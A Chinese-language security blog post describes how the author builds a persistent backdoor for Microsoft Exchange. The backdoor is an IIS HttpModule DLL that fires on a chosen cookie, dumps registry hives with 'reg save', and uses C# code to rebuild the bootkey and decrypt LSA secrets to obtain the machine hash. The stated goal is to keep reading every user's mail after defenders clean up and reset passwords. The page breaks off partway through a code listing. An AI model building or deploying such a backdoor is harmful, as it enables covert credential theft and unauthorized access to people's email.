

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/b6.png">
  <link rel="icon" type="image/png" href="/img/b6.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Gr3yy">
  <meta name="keywords" content="">
  <title>从零到一开发一个exchange后门 - Gr3yy&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"gr3yyy123.github.io","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":90,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.3.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Gr3yy's B1og</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                Links
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="从零到一开发一个exchange后门">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-03-27 05:00" pubdate>
        March 27, 2022 am
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      4.7k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      65
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">从零到一开发一个exchange后门</h1>
            
            <div class="markdown-body">
              <h1 id="从零到一开发一个exchange后门"><a href="#从零到一开发一个exchange后门" class="headerlink" title="从零到一开发一个exchange后门"></a>从零到一开发一个exchange后门</h1><p>exchange作为微软旗下一款成熟的邮箱应用，在政企中受众很广。最近在项目中，一直在思考针对exchange的持久化问题，考虑的场景为，假定的目标发现并清理了我们的权限，用户也全部修改了密码。但我们仍可以正常的获得用户邮件。（ office365的场景不做讨论）换句话说，即是在没有用户凭据以及漏洞的前提下通过exchange获得任意用户邮件。</p>
<h2 id="需求分析"><a href="#需求分析" class="headerlink" title="需求分析"></a>需求分析</h2><p><strong><em>需求：不通过用户凭据以及权限获取任意用户邮件</em></strong></p>
<h3 id="方案一"><a href="#方案一" class="headerlink" title="方案一"></a>方案一</h3><p>一开始我考虑的方案是：</p>
<p><strong><em>通过白银票据，模拟任意用户，登录exchenge的 <code>ews</code> 接口，通过soap请求获得邮件</em></strong></p>
<p>这个方案需要的条件：</p>
<ul>
<li>exchange 机器hash</li>
<li>域的 sid</li>
</ul>
<p>通过白银票据模拟任意用户，伪造服务为 <code>http</code> ，因为白银票据的特点，不需要与域控交互，且 ews 接口支持 <code>negoiet</code> 认证，所以该方法可通过ews处的认证</p>
<p>然而该方法在后续的实践中还是有一些小麻烦，比如通过代码传递票据等，当时实践不是很顺利</p>
<h3 id="方案二"><a href="#方案二" class="headerlink" title="方案二"></a>方案二</h3><p>后来和朋友讨论时，获得了第二个方案</p>
<p><strong><em>通过exchange机器用户身份登录 ews 接口，通过soap请求获得任意用户邮件</em></strong></p>
<p>这个方案需要的条件：</p>
<ul>
<li>exchange 机器hash</li>
<li>下载用户的sid</li>
</ul>
<p>最终我选用了方案二</p>
<h3 id="后门结构"><a href="#后门结构" class="headerlink" title="后门结构"></a>后门结构</h3><p>最终我决定了这样的结构：</p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs livescript">client --&gt; backdoor_server ---<span class="hljs-function"><span class="hljs-params">(sid，hash)</span>---&gt;</span> client ---<span class="hljs-function"><span class="hljs-params">(xml)</span>--&gt;</span> backdoor_server ---(mail)---&gt; client<br></code></pre></td></tr></table></figure>
<h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><h3 id="Server端"><a href="#Server端" class="headerlink" title="Server端"></a>Server端</h3><p>无论选用哪种方案，其实需求的条件相差不大，都需要：</p>
<ul>
<li>exchange 机器hash</li>
</ul>
<p>唯一的区别就是方案二需要用户的sid，方案一只需要域的sid</p>
<p>所以server端的功能就很清晰了，通过特定请求，获取exchange的机器hash以及指定用户的sid。</p>
<p>因为exchange可以留aspx文件的目录比较局限，且查杀严格，所以计划改成一个针对iis的 dll 的后门。</p>
<p>因为之前也并没有系统学习过 c# 或者.net 的开发，所以这次属于现学现写，在网上找到的资料里拼拼凑凑。所幸当你模块与需求明确时，总能找到解决办法。</p>
<p>一开始需要解决的问题自然是如何开始一个iis的dll后门，他需要能先.net应用去解析请求，识别我们的特定请求并给予响应。</p>
<h4 id="从IHttpModule开始"><a href="#从IHttpModule开始" class="headerlink" title="从IHttpModule开始"></a>从IHttpModule开始</h4><p>IHttpModule 为 System.web命名空间下的类。他会处理任何针对.net服务端的http请求。在.net 中，IHttpHandler负责处理针对.net注册文件的请求，而IHttpModule先IHttpHandler针对所有http请求进行响应。</p>
<p><img src="/img/article2/image-20220326045448200.png" srcset="/img/loading.gif" alt="image-20220326045448200"></p>
<p>IHttpHandler接口只有两个成员：</p>
<ul>
<li>void Dispose()：处置由实现 System.Web.IHttpModule 的模块使用的资源（内存除外）。</li>
<li>void Init(HttpApplication context)：初始化模块，并使其为处理请求做好准备。参数:context:一个System.Web.HttpApplication，它提供对 ASP.NET 应用程序内所有应用程序对象的公用的方法、属性和事件的访问</li>
</ul>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c#"><span class="hljs-keyword">using</span> System;<br><span class="hljs-keyword">using</span> System.Collections.Generic;<br><span class="hljs-keyword">using</span> System.Text;<br><span class="hljs-keyword">using</span> System.Web;<br><br><span class="hljs-keyword">namespace</span> <span class="hljs-title">IIS_BackDoor</span><br>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title">MyModule</span> : <span class="hljs-title">IHttpModule</span><br>    &#123;<br>        <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title">Dispose</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span>        &#123;<br>        &#125;<br><br>        <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title">Init</span>(<span class="hljs-params">HttpApplication context</span>)</span><br><span class="hljs-function"></span>        &#123;<br>            context.PreRequestHandlerExecute += <span class="hljs-keyword">new</span> EventHandler(Context_PreRequestHandlerExecute);<br>        &#125;<br><br>        <span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title">Context_PreRequestHandlerExecute</span>(<span class="hljs-params"><span class="hljs-built_in">object</span> sender, EventArgs e</span>)</span><br><span class="hljs-function"></span>        &#123;<br>            <span class="hljs-comment">// do somthing</span><br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
<h4 id="针对iis的后门"><a href="#针对iis的后门" class="headerlink" title="针对iis的后门"></a>针对iis的后门</h4><p>Microsoft 定义了一个称为 ISAPI（Internet 服务器应用程序编程接口）的 API，以帮助开发人员向 IIS 添加功能。ISAPI几乎控制着IIS中一切动态内容的生命，因为只有ISAPI，才可以构建动态内容交互式网页（如ASPX/PHP等）可以理解为解释器。</p>
<p>可以向 IIS 添加一种组件：过滤器。</p>
<ul>
<li>过滤器是导出 3 个函数的 DLL：</li>
</ul>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">GetFilterVersion</span><br><span class="hljs-attribute">HttpFilterProc</span><br><span class="hljs-attribute">TerminateFilter</span><br></code></pre></td></tr></table></figure>
<p>过滤器注册了许多事件，每次在请求的生命周期内发生事件时，都会调用 HttpFilterProc。以下是过滤器可以注册的事件的不完整列表：</p>
<figure class="highlight vbnet"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs vbnet"><span class="hljs-symbol">SF_NOTIFY_PREPROC_HEADERS:</span> happens <span class="hljs-keyword">when</span> IIS has finished preprocessing headers.<br><span class="hljs-symbol">SF_NOTIFY_SEND_RESPONSE:</span> happens <span class="hljs-keyword">when</span> IIS <span class="hljs-built_in">is</span> ready <span class="hljs-keyword">to</span> send response <span class="hljs-keyword">to</span> the client<br><span class="hljs-symbol">SF_NOTIFY_END_OF_REQUEST:</span> happens <span class="hljs-keyword">when</span> a request has ended its lifecycle<br><span class="hljs-symbol">SF_NOTIFY_LOG:</span> happens before IIS writes log <span class="hljs-keyword">for</span> the current request<br></code></pre></td></tr></table></figure>
<p>由上可知，可通过http请求的多处参数来触发filter。一旦触发，就会调用过滤器的 HttpFilterProc 并提供一个结构，具体取决于事件的类型。</p>
<p>不过filter只支持c++实现，但我们通过 IHttpModule 也同样可以实现如同isapi接口filter相同的功能。</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs c#"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">context_filter</span>(<span class="hljs-params">HttpContext context, HttpRequest Request</span>)</span><br><span class="hljs-function"></span>        &#123;<br>            HttpCookieCollection MyCookieColl;<br>            HttpCookie MyCookie;<br>            MyCookieColl = Request.Cookies;<br>            String[] arr1 = MyCookieColl.AllKeys;<br><br>            <span class="hljs-keyword">if</span> (arr1.Length &gt; <span class="hljs-number">0</span>)<br>            &#123;<br>                MyCookie = MyCookieColl[arr1[<span class="hljs-number">0</span>]];<br>                <span class="hljs-keyword">if</span> (MyCookie.Name.Equals(<span class="hljs-string">&quot;test&quot;</span>))<br>                &#123;<br>                    String cookie = MyCookie.Value;<br>                    context.Response.Clear();<br>                    context.Response.Write(<span class="hljs-string">&quot;test&quot;</span>);<br>                    allResults.Clear();<br>                    context.Response.End();<br>                    context.Response.Close();<br>            &#125;<br></code></pre></td></tr></table></figure>
<p>如上代码，通过HttpModule也可实现如同filter的功能。当我们收到包含 cookie 值”test”  的请求时，会先aspx等文件被IHttpModule处理，在页面输出 “test”。这样就可以基本达到后门的需求。</p>
<p>现在我们的基本框架已经基本完成，下面要开始实现具体的模块。</p>
<h4 id="获得hash"><a href="#获得hash" class="headerlink" title="获得hash"></a>获得hash</h4><p>参考：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/224171.html">https://www.freebuf.com/articles/system/224171.html</a></p>
<p><img src="/img/article2/image-20220327042513851.png" srcset="/img/loading.gif" alt="image-20220327042513851"></p>
<p>最先需要完成的就是获取机器hash的功能。</p>
<p>通过我们日常的攻防测试我们可以知道，我们可以通过机器的注册表获得用户的凭据。</p>
<p>一般我们会用到：</p>
<ul>
<li>sam：sam数据库保存windows本地的用户信息</li>
<li>system：system数据库中保存 bootkey 用于解密sam中保存的解密的hash</li>
<li>security：存储lsa策略，缓存域内登录的用户与服务信息。</li>
</ul>
<p>一般通过如下方式导出</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs stata"><span class="hljs-keyword">reg</span> <span class="hljs-keyword">save</span> hklm\sam sam<br><span class="hljs-keyword">reg</span> <span class="hljs-keyword">save</span> hklm\system system<br><span class="hljs-keyword">reg</span> <span class="hljs-keyword">save</span> hklm\security security<br></code></pre></td></tr></table></figure>
<p>转储注册表，然后可以通过 <code>secretsdump.py</code> 来获取机器hash</p>
<p>现在我们需要通过 c# 来完成这些操作，所以过程应该就是：</p>
<ul>
<li>获取注册表内容 —–&gt; 解密</li>
</ul>
<p>而我们想要获得的时机器hash，所以我们需要的是security注册表</p>
<p>当用域账号去登陆这台机器，在登陆成功后（域控验证了你的身份后），系统会将你的凭据以及授权信息保存在注册表里面。默认是保存 10 个凭据（可以对这个值进行更改）。当被保存的凭据已经超过 10 个的话，新的凭据会覆盖掉老的凭据。</p>
<p>凭据被缓存在注册表里的这些用户，在机器连不上域控的时候也可以登陆这台机器（只能交互式登陆，比如控制台或远程桌面)。</p>
<p><img src="/img/article2/image-20220327030321316.png" srcset="/img/loading.gif" alt="image-20220327030321316"></p>
<h5 id="注册表服务"><a href="#注册表服务" class="headerlink" title="注册表服务"></a>注册表服务</h5><p>参考了网络上获取注册表的方式</p>
<p>首先加载指定机器的注册表服务</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c#"><span class="hljs-keyword">class</span> <span class="hljs-title">RemoteOps</span><br>    &#123;<br>        <span class="hljs-keyword">public</span> <span class="hljs-built_in">string</span> hostname;<br>        IntPtr scMgr = IntPtr.Zero;<br>        <span class="hljs-keyword">public</span> IntPtr remoteRegHandle = IntPtr.Zero;<br>        <span class="hljs-built_in">int</span> remoteRegistryInitialStatus = <span class="hljs-number">0</span>;<br>        <span class="hljs-built_in">bool</span> remoteRegistryDisabled = <span class="hljs-literal">false</span>;<br><br>        <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-title">RemoteOps</span>(<span class="hljs-params"><span class="hljs-built_in">string</span> remoteHostname</span>)</span><br><span class="hljs-function"></span>        &#123;<br>            hostname = remoteHostname;<br>            StartRemoteRegistry();<br>        &#125;<br></code></pre></td></tr></table></figure>
<p>然后可以通过 <code>advapi32.dll</code> 中提供的注册表函数去读取注册表信息</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs c#">[<span class="hljs-meta">DllImport(<span class="hljs-meta-string">&quot;advapi32&quot;</span>)</span>]<br><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">extern</span> <span class="hljs-built_in">int</span> <span class="hljs-title">RegConnectRegistry</span>(<span class="hljs-params"><span class="hljs-built_in">string</span> machine, UIntPtr hKey, <span class="hljs-keyword">out</span> IntPtr pRemKey</span>)</span>;<br><br>[<span class="hljs-meta">DllImport(<span class="hljs-meta-string">&quot;Advapi32.dll&quot;</span>, EntryPoint = <span class="hljs-meta-string">&quot;RegGetValueW&quot;</span>, CharSet = CharSet.Unicode, SetLastError = true)</span>]<br><span class="hljs-function"><span class="hljs-keyword">internal</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">extern</span> Int32 <span class="hljs-title">RegGetValue</span>(<span class="hljs-params">IntPtr hkey, <span class="hljs-built_in">string</span> lpSubKey, <span class="hljs-built_in">string</span> lpValue, uint dwFlags, <span class="hljs-keyword">out</span> uint pdwType, IntPtr pvData, <span class="hljs-keyword">ref</span> Int32 pcbData</span>)</span>;<br><br>[<span class="hljs-meta">DllImport(<span class="hljs-meta-string">&quot;advapi32.dll&quot;</span>, CharSet = CharSet.Unicode, EntryPoint = <span class="hljs-meta-string">&quot;RegOpenKeyExW&quot;</span>, SetLastError = true)</span>]<br><span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">extern</span> <span class="hljs-built_in">int</span> <span class="hljs-title">RegOpenKeyEx</span>(<span class="hljs-params">IntPtr hKey, <span class="hljs-built_in">string</span> subKey, uint options, <span class="hljs-built_in">int</span> sam, <span class="hljs-keyword">out</span> IntPtr phkResult</span>)</span>;<br><br>[<span class="hljs-meta">DllImport(<span class="hljs-meta-string">&quot;advapi32.dll&quot;</span>, CharSet = CharSet.Unicode, SetLastError = true)</span>]<br><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">extern</span> <span class="hljs-built_in">int</span> <span class="hljs-title">RegQueryInfoKey</span>(<span class="hljs-params">IntPtr hKey, [Out(</span>)] StringBuilder lpClass, <span class="hljs-keyword">ref</span> uint lpcchClass,</span><br><span class="hljs-function">                                  IntPtr lpReserved, IntPtr lpcSubkey, IntPtr lpcchMaxSubkeyLen,</span><br><span class="hljs-function">                                  IntPtr lpcchMaxClassLen, IntPtr lpcValues, IntPtr lpcchMaxValueNameLen,</span><br><span class="hljs-function">                                  IntPtr lpcbMaxValueLen, IntPtr lpSecurityDescriptor, IntPtr lpftLastWriteTime)</span>;<br></code></pre></td></tr></table></figure>
<ul>
<li>RegOpenKeyEx：此函数打开指定的键</li>
<li>RegQueryInfoKey：此函数检索有关指定注册表项的信息。</li>
<li>RegGetValue：检索指定注册表值的类型和数据。</li>
</ul>
<p><img src="/img/article2/image-20220327042200521.png" srcset="/img/loading.gif" alt="image-20220327042200521"></p>
<p>定义OpenRegKey函数获得注册表句柄</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs c#"><span class="hljs-function"><span class="hljs-keyword">public</span> IntPtr <span class="hljs-title">OpenRegKey</span>(<span class="hljs-params"><span class="hljs-built_in">string</span> key</span>)</span><br><span class="hljs-function"></span>        &#123;<br>            <span class="hljs-built_in">int</span> KEY_MAXIMUM_ALLOWED = <span class="hljs-number">0x02000000</span>;<br>            IntPtr regKeyHandle;<br>            <span class="hljs-keyword">if</span> (RegOpenKeyEx(remoteRegHandle, key, <span class="hljs-number">0</span>, KEY_MAXIMUM_ALLOWED, <span class="hljs-keyword">out</span> regKeyHandle) == <span class="hljs-number">0</span>)<br>            &#123;<br>                <span class="hljs-keyword">return</span> regKeyHandle;<br>            &#125;<br></code></pre></td></tr></table></figure>
<h5 id="获取security"><a href="#获取security" class="headerlink" title="获取security"></a>获取security</h5><figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c#">RemoteOps remoteConnection = <span class="hljs-keyword">new</span> RemoteOps(<span class="hljs-string">&#x27;127.0.0.1&#x27;</span>);<br><span class="hljs-built_in">byte</span>[] bootKey = GetBootKey(<span class="hljs-keyword">ref</span> remoteConnection);<br><span class="hljs-built_in">string</span> securityRemoteLocation = <span class="hljs-string">@&quot;\\&quot;</span> + singleTarget + <span class="hljs-string">@&quot;\ADMIN$\&quot;</span> + securityOut;<br><span class="hljs-keyword">if</span> (remoteConnection.SaveRegKey(<span class="hljs-string">&quot;SECURITY&quot;</span>, <span class="hljs-string">@&quot;\Windows\&quot;</span> + <span class="hljs-string">&#x27;security.log&#x27;</span>))<br>&#123;<br><br>    RegistryHive security = remoteConnection.GetRemoteHiveDump(securityRemoteLocation);<br>remoteConnection.Cleanup(samRemoteLocation, securityRemoteLocation);<br>allResults.Add(singleHostResults);<br></code></pre></td></tr></table></figure>
<p>解密同样需要获得bootkey</p>
<p>bootkey是由四个分离的部分组成的，<code>SYSTEM\CurrentControlSet\Control\Lsa\&#123;JD,Skew1,GBG,Data&#125;</code>，但是我们实际中要用到的数据是无法直接使用regedit看到的，而且，每一部分都被存到了这些键的Class属性中，而且进行了Unicode编码，以16进制的形式存储。BootKey的长度为16字节，获得了bootKey后，还需要进行解混淆操作</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs c#"><span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-built_in">byte</span>[] <span class="hljs-title">GetBootKey</span>(<span class="hljs-params"><span class="hljs-keyword">ref</span> RemoteOps remoteConnection</span>)</span><br><span class="hljs-function"></span>        &#123;<br>            <span class="hljs-built_in">string</span>[] keys = <span class="hljs-keyword">new</span> <span class="hljs-built_in">string</span>[<span class="hljs-number">4</span>] &#123; <span class="hljs-string">&quot;JD&quot;</span>, <span class="hljs-string">&quot;Skew1&quot;</span>, <span class="hljs-string">&quot;GBG&quot;</span>, <span class="hljs-string">&quot;Data&quot;</span> &#125;;<br>            <span class="hljs-built_in">byte</span>[] transforms = <span class="hljs-keyword">new</span> <span class="hljs-built_in">byte</span>[] &#123; <span class="hljs-number">0x8</span>, <span class="hljs-number">0x5</span>, <span class="hljs-number">0x4</span>, <span class="hljs-number">0x2</span>, <span class="hljs-number">0xb</span>, <span class="hljs-number">0x9</span>, <span class="hljs-number">0xd</span>, <span class="hljs-number">0x3</span>, <span class="hljs-number">0x0</span>, <span class="hljs-number">0x6</span>, <span class="hljs-number">0x1</span>, <span class="hljs-number">0xc</span>, <span class="hljs-number">0xe</span>, <span class="hljs-number">0xa</span>, <span class="hljs-number">0xf</span>, <span class="hljs-number">0x7</span> &#125;;<br>            StringBuilder scrambledKey = <span class="hljs-keyword">new</span> StringBuilder();<br><br>            <span class="hljs-keyword">for</span> (<span class="hljs-built_in">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">4</span>; i++)<br>            &#123;<br>                <span class="hljs-built_in">string</span> keyPath = <span class="hljs-string">@&quot;SYSTEM\CurrentControlSet\Control\Lsa\&quot;</span> + keys[i];<br>                IntPtr regKeyHandle = remoteConnection.OpenRegKey(keyPath);<br>                scrambledKey.Append(remoteConnection.GetRegKeyClassData(regKeyHandle));<br>                remoteConnection.CloseRegKey(regKeyHandle);<br>            &#125;<br>            <span class="hljs-built_in">byte</span>[] scrambled = StringToByteArray(scrambledKey.ToString());<br>            <span class="hljs-built_in">byte</span>[] unscrambled = <span class="hljs-keyword">new</span> <span class="hljs-built_in">byte</span>[<span class="hljs-number">16</span>];<br>            <span class="hljs-keyword">for</span> (<span class="hljs-built_in">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">16</span>; i++)<br>            &#123;<br>                unscrambled[i] = scrambled[transforms[i]];<br>            &#125;<br>            <span class="hljs-keyword">return</span> unscrambled;<br></code></pre></td></tr></table></figure>
<h5 id="解密lsa获得hash"><a href="#解密lsa获得hash" class="headerlink" title="解密lsa获得hash"></a>解密lsa获得hash</h5><p>如之前的图示，缓存信息的加密密码为 <code>NL$KM</code> 密钥</p>
<p>而机器hash存储在 <code>$MACHINE.ACC</code> 之中</p>
<p><img src="https://2603957456-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-L_nYmCFo8ktkxF6qft3%2F-L_nZ7oFKOEfqjALlDeR%2FScreenshot%20from%202019-03-12%2020-20-39.png?alt=media&token=89ffe933-7352-4323-ab6d-9f1e93213da4" srcset="/img/loading.gif" alt="img"></p>
<p><strong><em>解密步骤</em></strong>：</p>
<ul>
<li><p>得到 bootkey</p>
</li>
<li><p>利用 bootkey 解密 LSA Key</p>
</li>
<li><p>利用 LSA Key 解密 NLKM Key</p>
</li>
<li><p>利用 NLKM Key 解密 MSCACHE</p>
</li>
</ul>
<p>这一段是参考的网络上的项目</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span 